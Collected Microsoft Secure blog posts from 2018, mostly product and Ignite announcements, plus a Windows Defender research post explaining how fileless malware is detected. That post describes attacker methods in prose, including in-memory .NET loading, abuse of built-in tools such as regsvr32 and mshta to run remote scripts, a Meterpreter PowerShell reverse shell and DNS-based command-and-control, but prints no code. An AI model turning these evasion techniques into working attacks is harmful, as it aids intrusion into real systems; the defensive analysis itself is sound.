Customers using System Center Configuration Manager and Microsoft Intune to manage their existing infrastructure benefit immediately from the scale, reliability, and security of the cloud. We announced new capabilities for unified endpoint management (UEM) at Ignite to empower IT to secure your data across a variety of devices and platforms, and to help you deliver intuitive and native user experiences for Windows 10, iOS, and Android devices. Read more about all the UEM advancements or watch the Ignite session.

Looking ahead

Working closely with customers is at the center of our ability to innovate and evolve our security technologies. Ignite is a top-notch opportunity to build security community. It doesnt stop there though. We are always interested in your feedback as we roll out new capabilitiesdo join us and have your voice heard via the Tech Community.

The post Ignite 2018 highlights: passwordless sign-in, confidential computing, new threat protection, and more appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Collaborate securely

October 1st, 2018 No comments

This is a blog series that responds to common questions we receive from customers about deployment of Microsoft 365 security solutions. In this series youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Protecting user identities, the fourth blog in our eight-blog series on deploying Intelligent Security Scenarios.

Image taken at the Microsoft Ignite Conference.

Your users can create, edit, and share a single document securely, even when working with multiple stakeholders, both inside and outside of your company. With Microsoft security solutions, users can identify, classify, track, and protect documents to prevent leaks and block access by unauthorized readers. These security measures travel with the document, making it easy and much less risky for stakeholders to download files.

How can I make it easier for groups of people to securely work on the same document?

Provide a common, secure identity for your employees, by first importing their user identities into Azure Active Directory (Azure AD). Then integrate your on-premises directories with Azure AD using Azure AD Connect, which allows you to create a common, secure identity for your users for Microsoft Office 365, Azure, and thousands of other software as a service (SaaS) applications that are integrated with Azure AD.

To make it easy for your employees to work securely with users from other organizations, enable Azure AD B2B collaboration capabilities. Now you can provide access to documents, resources, and applications to your partners while maintaining complete control over your own corporate data (see Figure 1). For your customers, Azure AD B2C lets you build identities on Windows, Android, and iOS devices, or for the web, and allow your customers’ users to sign in with their existing social accounts or personal emails.

Infographic detailing Azure Active Directory security.

Figure 1. Azure AD B2B collaboration enables organizations using Azure AD to work securely with users from other organizations while maintaining control over their own corporate data.

How can I protect organizational data when my users view, edit, and share documents?

Azure Information Protection enables you to configure policies and label a document to control who can see, edit, or share it. For example, a user could apply a Confidential label to a sensitive document that would then prevent it from being shared externally. You can also track who opened a document and where, and then determine what that person can do with the document after its opened.

With Microsoft Data Loss Prevention (DLP) in Microsoft Exchange, you can take your information protection one step further and create rules that automatically identify sensitive content and apply the appropriate policy. For example, you can identify any document containing a credit card number thats stored in any OneDrive for Business site, or you can monitor just the OneDrive sites of specific people.

In addition to DLP, OneDrive for Business offers its own set of options for protecting and controlling the flow of organizational information. For example, you can block file syncing on unmanaged devices, audit actions on OneDrive for Business files, and use mobile device management policies to manage any device that connects to your organizations OneDrive for Business account. You can control as much or as little of your employee permissions as you need to.

How can I protect email?

The same Microsoft DLP capabilities above can be applied to email on Exchange Online to better control data in email and prevent accidental data leaks. Use Office 365 Message Encryption for email sent via Outlook.com, Yahoo!, Gmail, and other email services. Email message encryption helps you make sure that only intended recipients can view message content. Office 365 administrators can define message flow rules to determine the conditions for encryption. For example, a rule can require the encryption of all messages addressed to a specific recipient.

Deployment tips from our experts

Start by provisioning employee identities in Azure AD. Identity is the foundation for secure collaboration. Your first step is to import employee identities into Azure AD and then integrate your on-premises directories with Azure Active Directory using Azure AD Connect.

Collaborate securely with other organizations. With Azure AD B2B and Azure AD B2C capabilities, you can work securely with customers and partners.

Protect documents and emails. Help protect information through access control, classification, and labeling that extend to shared documents and external stakeholders with Azure Information Protection. Then define message flow rules in Office 365 Message Encryption to determine the conditions for email encryption.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started at FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Collaborate and share documents securely in real-time. You can find additional security resources on Microsoft.com.

Coming soon! Productive and Secure, the sixth installment of our Deploying Intelligent Scenarios series. In November, we will kick off a new series, Top 10 Security Deployment Actions with Microsoft 365 Security.

More blog posts from this series

The post Collaborate securely appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV

September 27th, 2018 No comments

Consider this scenario: Two never-before-seen, heavily obfuscated scripts manage to slip past file-based detection and dynamically load an info-stealing payload into memory. The scripts are part of a social engineering campaign that tricks potential victims into running the scripts, which use the file names install_flash_player.js and BME040429CB0_1446_FAC_20130812.XML.PDF.js, to distribute and run the payload.

The payload is sophisticated and particularly elusive, given that it:

  • Doesnt touch the disk, and does not trigger antivirus file scanning
  • Is loaded in the context of the legitimate process that executed the scripts (i.e., wscript.exe)
  • Leaves no traces on the disk, such that forensic analysis finds limited evidence

These are markers of a fileless threat. Still, Windows Defender Advanced Threat Protection (Windows Defender ATP) antivirus capabilities detect the payload, stopping the attack in its tracks. How is this possible?

In this scenario, Antimalware Scan Interface (AMSI) facilitates detection. AMSI is an open interface that allows antivirus solutions to inspect script behavior by exposing script contents in a form that is both unencrypted and unobfuscated.

AMSI is part of the range of dynamic next-gen features that enable antivirus capabilities in Windows Defender ATP to go beyond file scanning. These features, which also include behavior monitoring, memory scanning, and boot sector protection, catch a wide spectrum of threats, including new and unknown (like the two scripts described above), fileless threats (like the payload), and other sophisticated malware.

Generically detecting fileless techniques

The two aforementioned obfuscated scripts are actual malware detected and blocked in the wild by antivirus capabilities in Windows Defender ATP. Removing the first layer of obfuscation reveals a code that, while still partially obfuscated, showed some functions related to a fileless malware technique called Sharpshooter. We found the two scripts, which were variants of the same malware, not long after the Sharpshooter technique was documented and published by MDSec in 2017.

The Sharpshooter technique allows an attacker to use a script to execute a .NET binary directly from memory without ever needing to reside on the disk. This technique provides a framework that can enable attackers to easily repackage the same binary payload within a script. As demonstrated by the example of the two scripts, files that use the Sharpshooter technique can then be used in social engineering attacks to lure users into running the script to deliver a fileless payload.

Screenshot of obfuscated scriptFigure 1. Obfuscated code from install_flash_player.js script

Screenshot of the script which contains functions typically used in the Sharpshooter technique

Figure 2. After de-obfuscation, the script contains functions typically used in the Sharpshooter technique

When the Sharpshooter technique became public, we knew it was only a matter time before it would be used it in attacks. To protect customers from such attacks, we implemented a detection algorithm based on runtime activity rather than on the static script. In other words, the detection is effective against the Sharpshooter technique itself, thus against new and unknown threats that implement the technique. This is how Windows Defender ATP blocked the two malicious scripts at first sight, preventing the fileless payload from being loaded.

The detection algorithm leverages AMSI support in scripting engines and targets a generic malicious behavior (a fingerprint of the malicious fileless technique). Script engines have the capability to log the APIs called by a script at runtime. This API logging is dynamic and is therefore not hindered by obfuscation: a script can hide its code, but it cannot hide its behavior. The log can then be scanned by antivirus solutions via AMSI when certain dangerous APIs (i.e., triggers) are invoked.

This is the dynamic log generated by the scripts and detected by Windows Defender ATP at runtime via AMSI:

Screenshot of the dynamic AMSI log generated during the execution of the Sharpshooter techniqueFigure 3. Dynamic AMSI log generated during the execution of the Sharpshooter technique in the two malicious scripts

Using this AMSI-aided detection, Windows Defender ATP disrupted two distinct malware campaigns in June, as well as the steady hum of daily activities.

Windows Defender ATP telemetry shows two Sharpshooter campaigns in JuneFigure 4. Windows Defender ATP telemetry shows two Sharpshooter campaigns in June

Furthermore, generically detecting the Sharpshooter technique allowed us to discover a particularly sophisticated and interesting attack. Windows Defender ATPs endpoint and detection response capabilities caught a VBScript file that used the Sharpshooter technique.

Sample Windows Defender ATP alert showing how detection of the Sharpshooter technique by Windows Defender AV is surfaced in Windows Defender Security CenterFigure 5. Sample Windows Defender ATP alert showing how detection of the Sharpshooter technique by Windows Defender AV is surfaced in Windows Defender Security Center

We analyzed the script and extracted the fileless payload, a very stealthy .NET executable. The malware payload downloads data from its command-and-control (C&C) server via the TXT records of DNS queries. In particular, it downloads the initialization vector and decryption key necessary to decode the core of the malware. The said core is also fileless because its executed directly in memory without being written on the disk. Thus, this attack leveraged two fileless stages.

Screenshot showing that the core component of the malware is decrypted and executed from memoryFigure 6. The core component of the malware is decrypted and executed from memory

Our investigation into the incident turned up enough indicators for us to conclude that this was likely a penetration testing exercise or a test involving running actual malware, and not a real targeted attack.

Nonetheless, the use of fileless techniques and the covert network communication hidden in DNS queries make this malware similar in nature to sophisticated, real-world attacks. It also proved the effectiveness of the dynamic protection capabilities of Windows Defender ATP. In a previous blog post, we documented how such capabilities allow Windows Defender ATP to catch KRYPTON attacks and other high-profile malware.

Upward trend in fileless attacks and living off the land

Removing the need for files is the next progression of attacker techniques. Antivirus solutions have become very efficient in detecting malicious executables. Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis. That’s why we are seeing an increase in attacks that use of malware with fileless techniques.

At a high level, a fileless malware runs its main payload directly in memory without having to drop the executable file on the disk first. This differs from traditional malware, where the payload always requires some initial executable or DLL to carry out its tasks. A common example is the Kovter malware, which stores its executable payload entirely in registry keys. Going fileless allows the attackers to avoid having to rely on physical files and improve stealth and persistence.

For attackers, building fileless attacks poses some challenges; in primis: how do you execute code if you don’t have a file? Attackers found an answer in the way they infect other components to achieve execution within these components environment. Such components are usually standard, legitimate tools that are present by default on a machine and whose functionality can be abused to accomplish malicious operations.

This technique is usually referred to as “living off the land”, as malware only uses resources already available in the operating system. An example is the Trojan:Win32/Holiks.A malware abusing the mshta.exe tool:

Trojan:Win32/Holiks.A is abusing mshta.exe to execute a script from command-lineFigure 7. Trojan:Win32/Holiks.A is abusing mshta.exe to execute a script from command-line

The malicious script resides only in the command line; it loads and executes further code from a registry key. The whole execution happens within the context of the mshta.exe process, which is a clean executable and tends to be trusted as a legitimate component of the operating system. Other similar tools, such as cmstp.exe, regsvr32.exe, powershell.exe, odbcconf.exe, rundll3.exe, just to name a few, have been abused by attackers. Of course, the execution is not limited to scripts; the tools may allow the execution of DLLs and executables, even from remote locations in some cases.

By living off the land, fileless malware can cover its tracks: no files are available to the antivirus for scanning and only legitimate processes are executed. Windows Defender ATP overcomes this challenge by monitoring the behavior of the system for anomalies or known patterns of malicious usage of legitimate tools. For example, Trojan:Win32/Powemet.A!attk is a generic behavior-based detection designed to prevent attacks that leverage the regsvr32.exe tool to run malicious scripts.

Antivirus capabilities Windows Defender ATP blocking legitimate regsvr32 tool abused to download and run a malicious remote scriptFigure 8. Antivirus capabilities in Windows Defender ATP blocking legitimate regsvr32 tool abused to download and run a malicious remote script

What exactly is fileless?

The term fileless suggests that a threat that does not come in a file, such as a backdoor that lives only in the memory of a machine. However, theres no generally accepted definition. The term is used broadly; its also used to describe malware families that do rely on files in order to operate. In the Sharpshooter example, while the payload itself is fileless, the entry point relies on scripts that need to be dropped on the targets machine and executed. This, too, is considered a fileless attack.

Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while others may involve the filesystem in some form or another.

To shed light on this loaded term, we grouped fileless threats into different categories.

Taxonomy of fileless threats

Figure 9. Taxonomy of fileless threats

We can classify fileless threats by their entry point (i.e., execution/injection, exploit, hardware), then the form of entry point (e.g., file, script, etc.), and finally by the host of the infection (e.g., Flash, Java, documents).

From this classification, we can glean three big types of fileless threats based on how much fingerprint they may leave on infected machines.

  • Type I: No file activity performed. A completely fileless malware can be considered one that never requires writing a file on the disk.
  • Type II: No files written on disk, but some files are used indirectly. There are other ways that malware can achieve fileless presence on a machine without requiring significant engineering effort. Fileless malware of this type do not directly write files on the file system, but they can end up using files indirectly.
  • Type III: Files required to achieve fileless persistence. Some malware can have some sort of fileless persistence but not without using files in order to operate.

Having described the broad categories, we can now dig into the details and provide a breakdown of the infection hosts. This comprehensive classification covers the panorama of what is usually referred to as fileless malware. It drives our efforts to research and develop new protection features that neutralize classes of attacks and ensure malware does not get the upper hand in the arms race.

Exploits Hardware Execution or injection

  • File-based (Type III: executable, Flash, Java, documents)
  • Network-based (Type I)

  • Device-based (Type I: network card, hard disk)
  • CPU-based (Type I)
  • USB-based (Type I)
  • BIOS-based (Type I)
  • Hypervisor-based (Type I)

  • File-based (Type III: executables, DLLs, LNK files, scheduled tasks)
  • Macro-based (Type III: Office documents)
  • Script-based (Type II: file, service, registry, WMI repo, shell)
  • Disk-based (Type II: Boot Record)

For a detailed description and examples of these categories, visit this comprehensive page on fileless threats.

Defeating fileless malware with next-gen protection

File-based inspection is ineffective against fileless malware. Antivirus capabilities in Windows Defender ATP use defensive layers based on dynamic behavior and integrate with other Windows technologies to detect and terminate threat activity at runtime.

Windows Defender ATPs next-gen dynamic defenses have become of paramount importance in protecting customers from the increasingly sophisticated attacks that fileless malware exemplifies. In a previous blog post we described some of the offensive and defensive technologies related to fileless attacks and how these solutions help protect our customers. Evolving from the file-centric scanning model, Windows Defender ATP uses a generic and more powerful behavior-centric detection model to neutralize generic malicious behaviors and thus take out entire classes of attack.

AMSI

Antimalware Scan Interface (AMSI) is an open framework that applications can use to request antivirus scans of any data. Windows leverages AMSI extensively in JavaScript, VBScript, and PowerShell. In addition, Office 365 client applications integrates with AMSI, enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior. In the example above, we have shown how AMSI can be a powerful weapon to fight fileless malware.

Windows Defender ATP has implemented AMSI provider and consumes all AMSI signals for protection, these signals are especially effective against obfuscation. It has led to the disruption of malware campaigns like Nemucod. During a recent investigation, we stumbled upon some malicious scripts that were heavily obfuscated. We collected three samples that were evading static signatures and are a mixture of barely recognizable script code and binary junk data.

Heavy obfuscation of three different samples of TrojanDownloader:Script/Nemucod.JACFigure 10. Heavy obfuscation of three different samples of TrojanDownloader:Script/Nemucod.JAC.

However, after manual de-obfuscation, it turned out that these samples decode and execute the same .js script payload, a known downloader:

A portion of the second stage downloader decrypted by Nemucod.JACFigure 11: A portion of the second stage downloader decrypted by Nemucod.JAC

The payload does not have any obfuscation and is very easy to detect, but it never touches the disk and so could evade file-based detection. However, the scripting engine is capable of intercepting the attempt to execute the decoded payload and ensuring that the payload is passed to the installed antivirus via AMSI for inspection. Windows Defender ATP has visibility on the real payload as its decoded at runtime and can easily recognize known patterns and block the attack before it deals any damage.

Instead of writing a generic detection algorithm based on the obfuscation patterns in the samples, we trained an ML model on this behavior log and wrote heuristic detection to catch the decrypted scripts inspected via AMSI. The results proved effective, catching new and unknown variants, protecting almost two thousand machines in a span of two months. Traditional detection would not have been as effective.

Nemucod.JAC attack campaigns caught via AMSIFigure 12. Nemucod.JAC attack campaigns caught via AMSI

Behavior monitoring

Windows Defender ATPs behavior monitoring engine provides an additional layer of antivirus protection against fileless malware. The behavior monitoring engine filters suspicious API calls. Detection algorithms can then match dynamic behaviors that use particular sequences of APIs with specific parameters and block processes that expose known malicious behaviors. Behavior monitoring is useful not only for fileless malware, but also for traditional malware where the same malicious code base gets continuously repacked, encrypted, or obfuscated. Behavior monitoring proved effective against WannaCry, which was distributed through the DoublePulsar backdoor and can be categorized as a very dangerous Type I fileless malware. While several variants of the WannaCry binaries were released in attack waves, the behavior of the ransomware remained the same, allowing antivirus capabilities in Windows Defender ATP to block new versions of the ransomware.

Behavior monitoring is particularly useful against fileless attacks that live off the land. The PowerShell reverse TCP payload from Meterpreter is an example: it can be run completely on a command line and can provide a PowerShell session to a remote attacker.

Example of a possible command line generated by MeterpreterFigure 13. Example of a possible command line generated by Meterpreter

Theres no file to scan in this attack, but through behavior monitoring in its antivirus capabilities, Windows Defender ATP can detect the creation of the PowerShell process with the particular command line required. Behavior monitoring detects and blocks numerous attacks like this on a daily basis.

Detections of the PowerShell reverse TCP payloadFigure 14. Detections of the PowerShell reverse TCP payload

Beyond looking at events by process, behavior monitoring in Windows Defender ATP can also aggregate events across multiple processes, even if they are sparsely connected via techniques like code injection from one process to another (i.e., not just parent-child processes). Moreover, it can persist and orchestrate sharing of security signals across Windows Defender ATP components (e.g., endpoint detection and response) and trigger protection through other parts of the layered defenses.

Behavior monitoring across multiple processes is not only an effective protection against fileless malware; its also a tool to catch attack techniques in generic ways. Here is another example where multi process behavior monitoring in action, Pyordono.A is a detection based on multi-process events and is aimed at blocking scripting engines (JavaScript, VBScript, Office macros) that try to execute cmd.exe or powershell.exe with suspicious parameters. Windows Defender ATP telemetry shows this detection algorithm protecting users from several campaigns.

Pyordono.A technique detected in the wildFigure 15. Pyordono.A technique detected in the wild

Recently, we saw a sudden increase in Pyordono.A encounters, reaching levels way above the average. We investigated this anomaly and uncovered a widespread campaign that used malicious Excel documents and targeted users in Italy from September 8 to 12.

Screenshot of malicious Excel document with instructions in Italian to click Enable contentFigure 16. Malicious Excel document with instructions in Italian to click Enable content

The document contains a malicious macro and uses social engineering to lure potential victims into running the malicious code. (Note: We have recently integrated Office 365 clients apps with AMSI, enabling antivirus solutions to scan macros at runtime to check for malicious content).

The obfuscated macro code attempts to run an obfuscated Cmd command which in turns executes an obfuscated Powershell script. In the end, the Ursnif trojan is delivered.Figure 17. The obfuscated macro code attempts to run an obfuscated Cmd command which in turns executes an obfuscated Powershell script. In the end, the Ursnif trojan is delivered.

The macro makes use of obfuscation to execute a cmd command, which is also obfuscated. The cmd command executes a PowerShell script that in turn downloads additional data and delivers the payload, infostealing Ursnif. We recently reported a small-scale Ursnif campaign that targeted small businesses in specific US cities. Through multi-process behavior monitoring, Windows Defender ATP detected and blocked the new campaign targeting users in Italy using a generic detection algorithm without prior knowledge of the malware.

Memory scanning

Antivirus capabilities in Windows Defender ATP also employ memory scanning to detect the presence of malicious code in the memory of a running process. Even if malware can run without the use of a physical file, it does need to reside in memory in order to operate and is therefore detectable by means of memory scanning. An example is the GandCrab ransomware, which was reported to have become fileless. The payload DLL is encoded in a string, then decoded and run dynamically via PowerShell. The DLL itself is never dropped on the disk. Using memory scanning, Windows Defender ATP can scan the memory of running processes and detect known patterns of the ransomware run from the stealthy DLL.

Memory scanning, in conjunction with behavior monitoring and other dynamic defenses, helped Windows Defender ATP to disrupt a massive Dofoil campaign. Dofoil, a known nasty downloader, uses some sophisticated techniques to evade detection, including process hollowing, which allows the malware to execute in the context of a legitimate process (e.g., explorer.exe). To this day, memory scanning detects Dofoil activities.

Detections of the memory-resident Dofoil payloadFigure 18. Detections of the memory-resident Dofoil payload

Memory scanning is a versatile tool: when suspicious APIs or behavior monitoring events are observed at runtime, antivirus capabilities in Windows Defender ATP trigger a memory scan in key points it is more likely to observe (and detect) a payload that has been decoded and may be about to run. This gives Windows Defender ATP granular control on which actions are more interesting and may require more attention. Every day, memory scanning allows Windows Defender ATP to protect thousands of machines against active high-profile threats like Mimikatz and WannaCry.

Boot Sector protection

With Controlled folder access on Windows 10, Windows Defender ATP does not allow write operations to the boot sector, thus closing a dangerous fileless attack vector used by Petya, BadRabbit, and bootkits in general. Boot infection techniques can be suitable for fileless threats because it can allow malware to reside outside of the file system and gain control of the machine before the operating system is loaded. The use of rootkit techniques, like in the defunct Alureon malware (also known as TDSS or TDL-4), can then render the malware invisible and extremely difficult to detect and remove. With Controlled folder access, which is part of Windows Defender ATPs attack surface reduction capabilities, this entire class of infection technique has become a thing of the past.

Control Folder Access preventing a boot sector infection attempted by PetyaFigure 19. Control Folder Access preventing a boot sector infection attempted by Petya

Windows 10 in S mode: Naturally resistant to fileless attacks

Windows 10 in S mode comes with a preconfigured set of restrictions and policies that make it naturally protected against a vast majority of the fileless techniques (and against malware in general). Among the available security features, the following ones are particularly effective against fileless threats:

For executables: Only Microsoft-verified applications from the Microsoft Store are allowed to run. Furthermore, Device Guard provides User Mode Code Integrity (UMCI) to prevent the loading of unsigned binaries.

For scripts: Scripting engines are not allowed to run (including JavaScript, VBScript, and PowerShell).

For macros: Office 365 does not allow the execution of macros in documents from the internet (for example, documents that are downloaded or received as attachment in emails from outside the organization).

For exploits: Exploit protection and Attack surface reduction rules are also available on Windows 10 in S mode as a consistent barrier against exploitation.

With these restrictions in place, Windows 10 in S mode devices are in a robust, locked down state, removing crucial attack vectors used by fileless malware.

Conclusion

As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too.

At Microsoft, we actively monitor the security landscape to identify new threat trends and develop solutions that continuously enhance Windows security and mitigate classes of threats. We instrument durable generic detections that are effective against a wide range of threats. Through AMSI, behavior monitoring, memory scanning, and boot sector protection, we can inspect threats even with heavy obfuscation. Machine learning technologies in the cloud allow us to scale these protections against new and emerging threats.

Security solutions on Windows 10 integrate into a unified endpoint security platform in Windows Defender Advanced Threat Protection. Windows Defender ATP includes attack surface reduction, next-generation protection, endpoint protection and response, auto investigation and remediation, security posture, and advanced hunting capabilities. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Protections against fileless and other threats are shared across Microsoft 365, which integrate technologies in Windows, Office 365, and Azure. Through the Microsoft Intelligent Security Graph, security signals are shared and remediation is orchestrated across Microsoft 365.

 

 

Andrea Lelli
Windows Defender Research

 

 

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV appeared first on Microsoft Secure.

Delivering security innovation that puts Microsoft’s experience to work for you

September 24th, 2018 No comments

Cybersecurity is the central challenge of our digital age. Without it, everything from our personal email accounts and privacy to the way we do business, and all types of critical infrastructure, are under threat. As attackers evolve, staying ahead of these threats is getting harder.

Microsoft can help. We focus on three areas: running security operations that work for you, building enterprise-class technology, and driving partnerships for a heterogeneous world. We can tip the scales in favor of the good guys and make the world a safer place.

Security operations that work for you

Every day, we practice security operations at a global scale to protect our customers, in the process analyzing more than 6.5 trillion signals. This is the most recent chapter in a journey down the experience curve that we have been on for more than a decade. Beginning with securing the operating system platform, our Microsoft Threat Intelligence Center (MSTIC) learned to build multi-dimensional telemetry to support security use cases, and to spot that rogue exploit in a distant crash dump bucket. Today, more than 3,500 full-time security professionals work to secure datacenters, run our Cyber Defense Operations Center, hack our own defenses, and hunt down attackers. We block more than 5 billion distinct malware threats per month. Just one recent example shows the power of the cloud. Microsofts cloud-based machine learning models detected a stealthy and highly targeted attack on small businesses across the U.S. with only 200 discrete targets called Ursnif and neutralized the threat. We surface this operational experience and the insights we derived in the security technology we build.

Building enterprise-class technology

It is the cloud that enables us to take all this signal, intelligence, and operational experience and use it to help our customers be more secure, with enterprise-class security technology. For example, we use the insights from processing hundreds of billions of authentications to cloud services a month to deliver risk-based conditional access for customers in Azure Active Directory (AD).

The end of the password era

We are not only protecting the Microsoft platform though. Our security helps protect hundreds of thousands of line-of-business and SaaS apps as they connect to Azure AD. We are delivering new support for password-less sign-in to Azure AD-connected apps via Microsoft Authenticator. The Authenticator app replaces your password with a more secure multi-factor sign-in that combines your phone and your fingerprint, face, or PIN. Using a multi-factor sign-in method, you can reduce compromise by 99.9 percent, and you can make the user experience simpler by eliminating passwords. No company lets enterprises eliminate more passwords than Microsoft. Today, we are declaring an end to the era of passwords.

Improving your security posture with a report card

Microsoft Secure Score is the only enterprise-class dynamic report card for cybersecurity. By using it, organizations get assessments and recommendations that typically reduce their chance of a breach by 30-fold. It guides you to take steps like securing admin accounts with Multi-Factor Authentication (MFA), securing user accounts with MFA, and turning off client-side email forwarding rules. Starting today, were expanding Secure Score to cover all of Microsoft 365. We are also introducing Secure Score for your hybrid cloud workloads in the Azure Security Center, so you have full visibility across your estate.

Putting cloud intelligence in your hands with Microsoft Threat Protection

By connecting our cloud intelligence to our threat protection solutions, we can stem a mass outbreak or find a needle in a haystack. A recent highly localized malware campaign, for example, targeted just under 200 home users and small businesses in a few U.S. cities. It was designed to fly under the radar, but Windows Defenders cloud-based machine learning models detected the malicious behavior and stopped it cold.

To help security operations professionals benefit from our experience, we created a community where our researchers and others from the industry can share advanced queries to hunt attackers and new threats, giving us all more insight and better protection.

Today, were announcing Microsoft Threat Protection, an integrated experience for detection, investigation, and remediation across endpoints, email, documents, identity, and infrastructure in the Microsoft 365 admin console. This will let analysts save thousands of hours as they automate the more mundane security tasks.

Protecting data wherever it goes

Cloud workloads are often targeted by cybercriminals because they operate on some of the most sensitive data an organization has. We made Azure the first cloud platform to offer confidentiality and integrity of data while in useadding to the protections already in place to encrypt data in transit and at rest. Azure confidential computing benefits will be available soon on a new DC series of virtual machines in Azure, enabling trusted execution environments using Intel SGX chipsets to protect data while it is computed on.

Sensitive data isnt only in databases and cloud workloads. A huge amount of the information we share in email and documents is private or sensitive too. To effectively protect your most important data, you need intelligent solutions that enable you to automatically discover, classify, label, protect, and monitor itno matter where it lives or travels. The Microsoft Information Protection solutions we announced last year help to do just that. Today, we are rolling out a unified labeling experience in the Security & Compliance center, which gives you a single, integrated approach to creating data sensitivity and data retention labels. We are also previewing labeling capabilities that are built right into Office apps across all major platforms, and extending labeling and protection capabilities to include PDF documents. The Microsoft Information Protection SDK, now generally available, enables other software creators to enhance and build their own applications that understand, apply, and act on Microsofts sensitivity labels.

Driving partnerships for a heterogenous world

To address a challenge as big as cybersecurity, we do more than only drive technological innovation. We invest in a broad set of technology and policy partnership initiatives.

We work across the industry to advance the state of the art and to lead on standards through organizations like the FIDO alliance, and to tackle emerging new ecosystem challenges like security for MCU-powered devices with innovations such as Azure Sphere, now available for preview.

We also work with our fellow security vendors to integrate the variety of security tools that our mutual customers use through our Microsoft Intelligent Security Association. Specifically, the Microsoft Graph Security API, generally available starting today, helps our partners work with us and each other to give you better threat detection and faster incident response. It connects a broad heterogeneous ecosystem of security solutions via a standard interface to help integrate security alerts, unlock contextual information, and simplify security automation.

Microsoft is working with tech companies, policymakers, and institutionscritical to the democratic processon strategies to protect our midterm elections. The Defending Democracy program is working to protect political campaigns from hacking, increase security of the electoral process, defend against disinformation, and bring greater transparency to political advertising online. Part of this program is the AccountGuard initiative that provides state-of-the-art cybersecurity protection at no extra cost to all candidates and campaign offices at the federal, state, and local level, as well as think tanks and political organizations. Weve had strong interest in AccountGuard and in the first month onboarded more than 30 organizations. Weve focused on onboarding large national party operations first and have successfully done so for committees representing both major U.S. parties as well as high profile campaigns and think tanks, and we are working to onboard additional groups each week. Microsoft is developing plans to extend our Defending Democracy program to democracies around the world.

Since participating in the establishment of the Cybersecurity Tech Accord, an agreement to defend all customers everywhere from malicious attacks by cybercriminal enterprises and nation states, we have seen that group nearly double in size with 27 new organizations joining from around the globe, including Panasonic, Salesforce, Swisscom, and Rockwell Automation to name a few, bringing total signatories to 61. Our Digital Crimes Unit has worked with global law enforcement agencies to bring criminals to justice: to date, taking down 18 criminal bot-nets and rescuing nearly 500 million devices from secret bot-net control. In partnership with security teams across the company, the Digital Crimes Unit has also combatted nation-state hackers, using innovative legal approaches 12 times in two years to shut down 84 fake websites, often used in phishing attacks and set up by a group known as Strontium that is widely associated with the Russian government.

Our unique leadership and unmatched breadth of impact in security comes with a unique responsibility to make the world a safer place. We embrace it, and I am optimistic about what we can do. Together with our customers, we are turning the tide in cybersecurity.

Ill be talking about these announcements and more today in my session at Ignite. If youre not in Orlando, you can live stream it. To learn more about Microsofts security offerings, visit Microsoft.com/security.

The post Delivering security innovation that puts Microsoft’s experience to work for you appeared first on Microsoft Secure.

Categories: cybersecurity, Featured Tags:

Get deeper into security at Microsoft Ignite 2018

This year at Microsoft Ignite, we will be making some exciting announcementsfrom new capabilities for identity management and information protection to powerful artificial intelligence (AI) innovations that can help you stay ahead of an often overwhelming surge in threats and security alerts.

Join us as we share best practices for current products, reveal highlights of our new offerings, and give you a glimpse of our future product vision.

Start by attending Satya Nadellas keynote. Then kickstart your security journey with this session: Microsoft Security: How the cloud helps us all be more secure featuring Rob Lefferts (GS008). Well highlight whats new in Microsoft security and how our customers and partners are using the Microsoft Cloud to accelerate security and productivity. Watch our demo showcase to see for yourself how unique intelligence and new innovations from Microsoft can help you be more secure across your entire digital estate.

Here are just a few of the other sessions at Ignite that will showcase our security technology and the innovation we have invested in throughout 2018 and into 2019. Add them to your Session Scheduler and check out the Session Catalog for the full list. If you cant attend in person, you can watch the live stream starting on September 24 with on-demand sessions to follow.

  • Leveraging the power of Microsoft threat protection (BRK4000). Learn about the services that make up Microsoft threat protection and how they work together across data, endpoints, identities, and infrastructure.
  • Double your security team productivitywithout doubling capacity (BRK2251). Learn how automated threat protection and remediation works seamlessly out of the box, using AI to respond to alerts and help security teams solve capacity and skill-gap challenges.
  • How to build security applications using the Microsoft Graph Security API (WRK3006). The Microsoft Graph has been extended with a new Security Graph API. Join this lab to get started using the Security API, including creating and authenticating a new app and using sample code to query the API.
  • Azure Active Directory: New features and roadmap (BRK2254). Come to this can’t-miss session for anyone working with or considering their strategy for identity and access management in the cloud. Hear about the newest features and experiences across identity protection, conditional access, single sign-on, hybrid identity environments, managing partner and customer access, and more.
  • Using Microsoft Secure Score to harden your security position (BRK3247). In this session, we help you understand what your current security position is in products like Office 365 and Windows and show you how you can easily increase your position though the built-in recommendations.
  • Getting to a world without passwords (BRK3031). Get the latest info and demos on what’s new with FIDO2, WebAuthN, Azure Active Directory, Windows Hello, and Microsoft Authenticator to help you make passwords a relic of the past.
  • Accelerate deployment and adoption of Azure Information Protection (BRK3009). Learn all about best practices in deploying Azure Information Protection to help protect your sensitive datawherever it lives or travels.
  • Registering and managing apps through Microsoft Azure Portal and Microsoft Graph API (THR2079). Come learn how to register apps to sign in Azure AD and personal Microsoft accounts, manage these apps, and get access to APIs all through Azure Portal, Microsoft Graph API, and PowerShell.
  • Secure enterprise productivity with Office 365 threat protection services (BRK4001). Learn about the latest advanced in services such as Exchange Online Protection (EOP), Advanced Threat Protection (ATP), and Threat Intelligenceand get a detailed roadmap of whats to come.
  • Simplify your IT management and level up with Microsoft 365 (GS004). Come and learn how Microsoft 365 will help you simplify your modern workplace, delight and empower your users, and protect and secure your corporate assets.
